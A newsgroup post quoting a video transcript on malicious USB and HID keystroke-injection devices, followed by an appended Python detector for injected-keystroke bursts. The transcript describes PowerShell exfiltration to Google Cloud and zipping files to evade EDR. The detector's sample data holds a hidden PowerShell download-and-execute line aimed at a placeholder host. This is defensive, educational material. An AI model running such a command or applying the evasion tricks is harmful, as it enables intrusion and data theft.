On Wed, 4/8/2026 1:12 PM, Alan K. wrote:
On 4/8/26 11:43 AM, Mr. Man-wai Chang wrote:
On 4/8/2026 8:19 PM, J. P. Gilliver wrote:
Well, over 17 minutes to say don't plug in strange USB sticks (or things that look like USB sticks/cables). Valid warning, but I've better things to do than wait through that (so didn't).
The first half of the video can indeed be skipped... :)
Damn, that's the part I watched, then gave up. Wouldn't that have been a nice piece of help in the original post?!!!
You can take those too-long YouTube videos
https://www.youtube.com/watch?v=OpcuqePIL7k
and run them through a transcript generator, to text form.
https://notegpt.io/youtube-transcript-generator
Use the copy button to place the text in the copy buffer.
Paste it into a new text editor window and save it. Then, in your favorite shell:
fmt -w80 input.txt > output.txt # Makes it slightly easier to read
Another way to do this is to capture the video with yt-dlp,
then use dsnote to convert it to text. That might make a few
more errors in transcription along the way. You might resort
to this method if any transcription service goes out of business.
At 00:09:25 we can see there is a change of pace of some sort.
00:09:25 ... Like, if you take apart this
************************************************************
00:00:00
>> So, you can go into the settings of your computer and say, "Don't trust any USB drive." And this can get past that.
>> This can get past that because it's not a USB drive.
>> Hey everybody, Adam Savage here, and today we're going to talk about this, the humble USB key. When I go to conventions and events, I am sometimes given USB drives by fans who would love to share their work with me. And I totally get that. But I have to tell every single one of them, I am never

00:00:24
plugging someone else's USB key into my computer or anyone else's. You have no idea what could be on these. Worse yet, the very act of plugging one in could initiate a malicious program on your computer. We asked the security experts from ThreatLocker to the cave to share examples with us of malicious devices they have encountered in the field, like this hacking hardware hidden inside an innocuous USB charging cable. I'm so glad you are here, because I pay a lot of attention to security, internet

00:00:59
security, encryption, the things that keep our data safe, because while we use computers almost every minute of every day, there are significant threats to our data and to our internet security that a lot of people aren't aware of. Isn't that true?
>> Absolutely. And they're getting worse every day. The attacks are increasing.
>> Okay, so let's start at the ground floor. What is the most bog-standard threat vector that your average person might
00:01:26
encounter?
>> Well, I think the computer itself,
>> right? Sure.
>> Fair. So, and the operator. So, if you think about this machine, or your phone, or anything else, it is so powerful it can be used to do anything. It can be used to video, record, exfil data, gain access to your bank accounts. And what that means is, if an attacker can get any kind of way into this machine, whether it's a user or whether it's a physical device,
>> they can now gain access to not just

00:01:56
your computer, but everything you use your computer for, which means your data, your bank account, your photos, your camera, right? It's not just a productivity tool. It's a gateway to all of the most important data of my life.
>> Yeah. I mean, you're basically walking around with a nuclear bomb in your passport.
>> And now I'm seeing here a bunch of what look like innocuous USB keys.
>> Yeah. And this is really the cool part about breaking into computers

00:02:19
is when you get something physical, because of course you can send somebody an email and somebody can click on something and you can gain access. But this is where it gets really interesting, because quite often people will think, well, this is a phone charger, right?
>> How much damage can this cause me? This is just a USB key. This is a USB key. How much damage can it cause? But these actually are essentially the keys to that really dangerous tool. Well, so there is this old meme that's been going

00:02:44
around forever, which is that our phones have more computing power than the Apollo guidance computer. And I updated that for myself about a decade ago, because I realized your USB drive has more computing power than the Apollo guidance computer. And I think maybe this charging cable might be able to possess more computing power than the Apollo guidance computer. Am I right? You could almost put a computer in here.
>> Yeah, there is a mini computer in there.
>> Some will run Linux on it. You can run
00:03:11
Linux off of a charging cable. That doesn't feel like anything is safe ever again.
>> And I don't think there's Wi-Fi in the Apollo. So, and that has Wi-Fi built right into it.
>> Okay. So, I feel like, will you walk me through some of the ways in which these can compromise your system?
>> So, this one here is the most basic. And this one is very, very cheap, very, very easy. And essentially, when you plug this into your computer, yeah, you plug the keyboard into it, and now it's going

00:03:38
to record all of your keystrokes, and then you can gain access to those keystrokes. So if somebody was to put this in your computer in your office, in between your keyboard and your computer, and then come back a week later, they could see everything you typed. All your passwords, every password, every character, every message you sent on your computer will now be on here.
>> Okay. And so that's why this is entry level, because it requires a physical installation and then a physical retrieval of the data.

00:04:04
Yes. And also you get one shot at getting what you want.
>> Right. Right. Right. It's not an ongoing threat.
>> It's not, whereas these get a little bit more interesting, because these can actually do things. And this here, essentially, it looks like a USB drive. If you block USB drives, it will not block it. Just to be clear, you can completely block USB drives in your environment and it will not block it. So you can go into the settings of your

00:04:28
computer and say, "Don't trust any USB drive." And this can get past that. This can get past that because it's not a USB drive. It's a USB device. And actually, I was at an event and I offered someone a free trip to Florida if this device couldn't exfil their data. And we had like 15 people line up trying to get this free trip to Florida for Zero Trust World. And the first guy was like, "I'm using this advanced EDR. My CISO says it's impossible. We block USB

00:04:55
drives." And straight away, all his data just uploaded to the internet. And the reason being is because it looks like a drive, but it actually presents as a keyboard.
>> Oh, so the computer doesn't even think... So it's not even on the list of things it doesn't like.
>> No, it says, "Oh, someone just plugged a keyboard in. Let the keyboard send keystrokes to my computer." And that's what's super terrifying about this one. Now, when you plug this in, it can
00:05:18
pretty much type anything you want. Now, it's only typing, so it can only do as much damage to you as your computer can. But again, your computer is this big weapon. So, we're going to use all of the tools in your machine to exfil data, or play music loud, or
>> maybe open up an email, send the email to a secret account, send passwords and stuff like that.
>> Yeah. And the two examples I like, and I know we got the Rickroll as well, but the first one is, the

00:05:42
Rickroll is really good for your kids at school, though, if you want to do that. But the first one is, you could literally just iterate through their documents, use a program built into Windows like PowerShell, and just say I'm going to copy all of the files up to the internet, and it will just take their files. And the other one is, you just plug it in for 20 seconds. You take it out, and it will now continuously take screenshots every 60 seconds. And we test
>> it's putting in a script. It's when it's

00:06:06
running in a script that runs in the background, and it literally will take screenshots and upload them. Every single one of the leading endpoint detection solutions: plugged it in, nothing, no alert, no anything. And for the next week, screenshots were just being uploaded to Google Cloud.
>> Oh my gosh. I have to say that ever since I heard about what a threat this can be, and this is well more than a decade ago, I have never plugged any USB key I did not purchase myself into my machine.

00:06:38
What can people do against something like this, if this is all of a sudden phoning home with all of your important data? How do you protect against that?
>> So I think the solution is you have to constrain this,
>> right? Because you can't stop, whether it's this or whether it's a user downloading and running something, you can't stop mistakes being made in every possible area. So what you have to do is say, well, I accept that something bad
00:07:04
might try and happen, but I've got all these programs on my computer. They can access everything, all my data. Why don't we just take away every program that doesn't need access to our data? Why don't we take away access to the internet if it doesn't need access to the internet? So suddenly these things don't... all they do is send keystrokes. So if they're going to open PowerShell, or open curl, or open command prompts, which are just built-in tools in Windows, if you block those tools

00:07:27
from seeing your programs, using a zero trust approach to security, it means yes, they'll run, but the damage is basically nothing.
>> So one of the ways in which these threat vectors work is by exploiting the computer's desire to be easy to work with.
>> Absolutely.
>> It wants to do things when you plug things in. It wants to run scripts and get stuff ready for you, so it's all there when you need it. And what you're talking about is software that limits those permissions so that

00:07:54
they're doled out at a reasonable pace. Is that right?
>> What you need to do, it should be able to do, and all of the tools that don't need access... because most people don't realize that they've got maybe three or four hundred programs on their computer, right?
>> Because they think, well, I'm running Zoom, I'm running Office, I'm running Chrome, but they don't realize that little Logitech QuickCam support app, all the system tools like PowerShell

00:08:14
and curl, everything that's built into Windows, all can be used against you. So if you just say, "Well, I'm going to take away all those tools where they're not needed," it makes an attacker's life much, much more miserable.
>> Now, is your guys' business model based on both a software model, but also training your clients about best practices and safe behaviors?
>> Yeah. So training the IT department, I think, is what our entire business, if
00:08:38
you like, marketing strategy is about: education to the IT department, because we understand that humans, people, users are going to make mistakes, right? It doesn't matter how good you are, how much you train them, someone's going to make a mistake. So
>> so that's what this pile here is. You can't keep one of these from entering your machine, right? There's too many ways in which that can happen, so you have to deal with

00:09:02
the aftermath.
>> Yeah, stop someone from being able to do something once they get onto your machine, and take away privileges where they're not required. And then it doesn't matter so much when your users make mistakes. What we're doing is we're essentially putting a crash barrier around your computer. It's like on the highway, you can't go into oncoming traffic, and yeah, you can mess around a bit, dent up your car, but you're not going to be able to cause massive damage.

00:09:25
All right. Now, I'm really curious about this. Like, if you take apart this, would you be able to, under any circumstances, tell if something nefarious had been added onto it? So in this case, this is specifically designed for bad purposes. So if you take this apart, it looks exactly like that. And yes, I can see, because there's a button here that puts me into attacker mode where I can program my payload. I can take this memory card out and I can copy things to that. All

00:09:49
right. So while I have maintained my security policy and not put unfamiliar USB drives in my computer, I am fascinated by what happens when that happens. Can we watch one of these do its nefarious thing?
>> Absolutely. So, I've got two computers here.
>> Yeah.
>> Kieran here is my attacker.
>> Yeah. Hacker.
>> He's going to steal my data. And this here is the victim.
>> That's the victim laptop.
>> Okay. The USB comes with C and A. And it

00:10:14
doesn't matter whether you're using Windows or Mac. You have to change the scripts around a little bit, but you can do it in both. And what I'm going to do is I'm just going to plug this into the computer.
>> Yeah.
>> And it's going to present as a keyboard. So, blocking USB drives is not going to do anything. Now, I've disabled the ThreatLocker security software here. So, it's going to get around everything, be able to run. Oh. Is that a command shell right there?
00:10:34
Yeah. And it's literally just running PowerShell, and now it's downloading data.
>> Wow.
>> And it's using legitimate software. I guess one of them was denied, but the rest of them seem to be...
>> No, because you don't have OneDrive on this computer.
>> Okay. Oh, it's missing. Okay. So, look, you can see now that it's literally uploading our data to the internet, and it's picking this VH recovery ISO because it's huge, which is going to

00:10:59
be slow. And it's going to start uploading all of these files to Google Cloud here. And the nice thing about this, we're doing two things. One is we're using Google. And the reason we're using Google is because no S and no alerts are going to trigger when you send data to Google, because there's so much data going to and from Google all the time, no one even blinks an eyelid. The second thing we're going to do is, we're using 7-Zip to compress everything together so we don't trigger

00:11:23
multiple files being uploaded. Two years ago, the script we had here would upload each file one at a time. And it took about two years, but some of the big antivirus and EDR companies started detecting all that mass upload as suspicious behavior. So, we just changed it. So, what it does, it zips it all up into one file, so they don't see this mass upload happening.
Now, I have heard stories about, like, convenience stores near important government facilities being seeded with compromised USB drives, so that some

00:11:56
contractor might buy one at the local 7-Eleven, plug it into their computer, and malware starts to be...
>> trade shows, switching them out.
>> I mean, whenever you go to a conference and you just take it, and the worst thing is you take these USB drives from someone's desk, someone could have gone and just swapped them on the table,
>> right? Because they look like they're giveaways, and it might not be the company themselves. You might say, "Well, I trust this company. They

00:12:15
wouldn't give me a bad USB drive," but you go over, you go and take one of the three USB drives. All it took was someone to walk by and go,
>> "Yeah, parking lots. Very, very common."
>> Parking lots.
>> Parking lot. You drop five of these in a parking lot, put "payroll" on them.
>> Who finds a USB drive in a parking lot and plugs it in? Do you just eat food that you find on the street? Do you chew gum from the subway? So, you go and put something intriguing
00:12:40
enough on something. And actually, I know of a police department where the head of cyber plugged in a device he found, and this... I wonder why. Cyber...
>> What are you going to do against?
>> Yeah. And now here's the thing, though. You don't even need someone... obviously I'm not going to plug something in, and you're not going to plug something in. But if you think about it, you've got 100 employees in your company, it just takes one.
>> Yeah. One person, and then you can gain access to the network. And then once

00:13:09
you're on the network, you can start doing things like slowly switching files out on network shares, and then you can get access to another machine, and it's very, very easy to move around once [someone] makes a mistake.
>> So the window here where we're seeing everything that the nefarious drive is doing, that's not a standard thing you see. You guys have put that up for visualization purposes.
>> Yeah. Essentially, typically, if you were really trying to steal data, you drag it

00:13:31
out of the way so the user can't see it. It's in the background. You don't want it to happen [in view]. Or you can minimize it and let it run in the background. I like to do that with the screen capture one where it'll take screenshots, because it will just continuously take screenshots in the background. And you can make that persistent so it happens on restart, or just until the user restarts their computer.
>> And of course the user shouldn't be able to see it when it's doing it.

00:13:49
Now we can see on this side all of our data is now uploaded. We can see all of the used files
>> just from plugging that in.
>> Just from plugging that in. No touching the keyboard, no anything.
>> Why is everybody using USB as, like, the most base level of a threat vector? So the reality is most of the attacks actually happen essentially from just an email, "run this command," or because... or one of the cool things we actually did, I think two years ago, was we were doing this on a Mac, and when I plugged it in

00:14:16
it asked me what type of keyboard it was, which kind of slowed me down as an attacker. So I went off and I did what any responsible CEO would do. I got half of our threat intelligence team to figure out how to get around it. In the meantime, they actually figured out how they could do it through Bluetooth, by intercepting the connection through AirPods and the Mac and sending the same keystrokes. So, it doesn't have to be USB. USB is just nice and easy to do.
>> So, in every way that our computers
00:14:39
are talking to each other and their devices for convenience, those are places that your data can leak out and
>> yeah,
>> threat vectors can leak in
>> any input or output, which could be Bluetooth, USB, internet. So you guys have been able to do this kind of scripting using the Bluetooth of your earbuds.
>> Yeah, we literally... and it was quite an interesting webinar, because our chief product officer loves Macs. Like, absolutely loves
>> well, I mean, they're very secure too.

00:15:06
They're famously
>> that's what he argued. So we... I had made a point of saying, look, it's just as bad, and we did the exact same thing. We exfilled all of his data. We managed to open, during the webinar... it was a PG-13 website, but an inappropriate site, and we got full control of his Mac, so we could literally do anything we wanted on it, persistently.
>> Wow.
>> Just by him... and we didn't even... All he had to do was pair his AirPods, and we were able to intercept that connection.

00:15:35
Now, Apple did fix it after we reported it to them. They kind of pushed it off at the beginning, but once we showed them what was really happening, they did go off and fix it in the next month's build.
>> Okay. Now, you guys do this for companies. Can you give me some advice that the viewers can take away about what each of us individuals can do about these kinds of threats? What are your best practices at home?
>> So I would say, first of all, I mean, this is obvious: don't plug things into

00:16:01
your computer that you didn't get. And also be a bit nice to your IT guy when he says, "No, you can't have your own cheap keyboard that you just..." So that's one part, but also, just when you're getting emails, when you're getting calls from people, AI is so effective now at replicating voices. Don't just run things on your computer without validating them. Call your IT department on their number. Say, "I've been asked to do this. Can you validate this?" Because most of these

00:16:29
ransomware attacks now, it's because a user did something, opened something, downloaded something from the internet they shouldn't have done. Every piece of software that you run on your computer can see every piece of data that's on your computer. And just remember, so when you're installing a game, it might not be... even if it's not an intentionally bad game, these guys aren't security engineers. They're writing games. So it's not that the game might compromise you, but the game might

00:16:55
compromise your ability to be secure.
>> Yes.
>> So only run what you need to run on a machine where you have access to critical data. If you want a game, go and get another machine, play the games on that machine. Don't log into your banking account and make anything... there's no such thing as a free product. Anything you're downloading free, just think about that.
>> Copy that. Guys, thank you so much. This has been such an education, and I have long wanted to see evil USB keys. Thank

00:17:21
you for showing me how they do their evil deeds.
>> You're welcome.
************************************************************
Paul
--- PyGate Linux v1.5.13
* Origin: Dragon's Lair, PyGate NNTP<>Fido Gate (3:633/10)
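Editor's note on the transcript above. The point the video keeps returning to is that a keystroke-injection device enumerates as a keyboard, so mass-storage blocking never sees it. What such a device cannot hide is its typing behaviour: a scripted payload arrives at a few milliseconds per key, far faster and more regular than a person. The block below is an added example, not code from the post, the video or ThreatLocker. It scans a stream of (timestamp_ms, key) events with a run-based check and reports bursts whose inter-key gaps are all below a human floor. The 40 ms floor, the 20-key minimum, the constructed sample log and the placeholder payload string are all assumptions chosen for illustration; a real deployment would feed it events from a HID hook or an input-event log and tune the thresholds against its own users.

```python
"""Keystroke-injection (BadUSB / HID) burst detector.

Added example, not from the post or the video. Thresholds and the
constructed keystroke log are assumptions for illustration only.
"""
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Assumed thresholds: even fast typists rarely sustain gaps under 40 ms for
# 20+ consecutive keystrokes, while HID injectors default to a few ms per key.
HUMAN_MIN_GAP_MS = 40
MIN_BURST_KEYS = 20

# Constructed sample input (not captured from a real device).
HUMAN_TEXT = "dear team, see attached"
PAYLOAD_KEYS = (["GUI+r"]
                + list('powershell -w hidden -nop -c "irm https://example.invalid/p | iex"')
                + ["ENTER"])


@dataclass
class Burst:
    start_ms: int
    end_ms: int
    keys: int
    mean_gap_ms: float
    preview: str  # first characters typed in the burst, for the analyst


def find_bursts(events: Iterable[Tuple[int, str]],
                min_gap_ms: int = HUMAN_MIN_GAP_MS,
                min_keys: int = MIN_BURST_KEYS) -> List[Burst]:
    """Return every run of >= min_keys keystrokes whose gaps are all < min_gap_ms.

    A run is broken by any human-sized gap; runs shorter than min_keys are
    ignored so that a quick two-key shortcut does not raise an alert.
    """
    evs = sorted(events)
    bursts: List[Burst] = []
    run_start = 0
    for i in range(1, len(evs) + 1):
        # The run ends at the end of the stream or at the first human-sized gap.
        if i == len(evs) or evs[i][0] - evs[i - 1][0] >= min_gap_ms:
            n = i - run_start
            if n >= min_keys:
                span = evs[i - 1][0] - evs[run_start][0]
                # Named keys (ENTER, GUI+r) are shown in angle brackets.
                text = "".join(k if len(k) == 1 else f"<{k}>"
                               for _, k in evs[run_start:i])
                bursts.append(Burst(evs[run_start][0], evs[i - 1][0], n,
                                    span / (n - 1), text[:40]))
            run_start = i
    return bursts


def constructed_log() -> List[Tuple[int, str]]:
    """Constructed sample: a person typing, a pause, then an injected payload."""
    events: List[Tuple[int, str]] = []
    t = 0
    for i, ch in enumerate(HUMAN_TEXT):
        events.append((t, ch))
        t += 90 + (i * 37) % 100      # 90..189 ms gaps, deterministic jitter
    t += 3000                         # pause: the rogue "keyboard" is plugged in
    for key in PAYLOAD_KEYS:
        events.append((t, key))
        t += 8                        # scripted keystrokes every 8 ms
    return events


if __name__ == "__main__":
    for b in find_bursts(constructed_log()):
        print(f"{b.start_ms}-{b.end_ms} ms: {b.keys} keys, "
              f"mean gap {b.mean_gap_ms:.1f} ms, typed: {b.preview!r}")
```

Run stand-alone it flags one burst: the injected run of keystrokes at an 8 ms mean gap, previewed as `<GUI+r>powershell -w hidden ...`, while the human-typed sentence before it produces nothing. The check is only a tripwire, not a substitute for the application-control approach the video describes; a patient device could pace itself under the threshold, which is why the block reports mean gap and preview rather than deciding on its own.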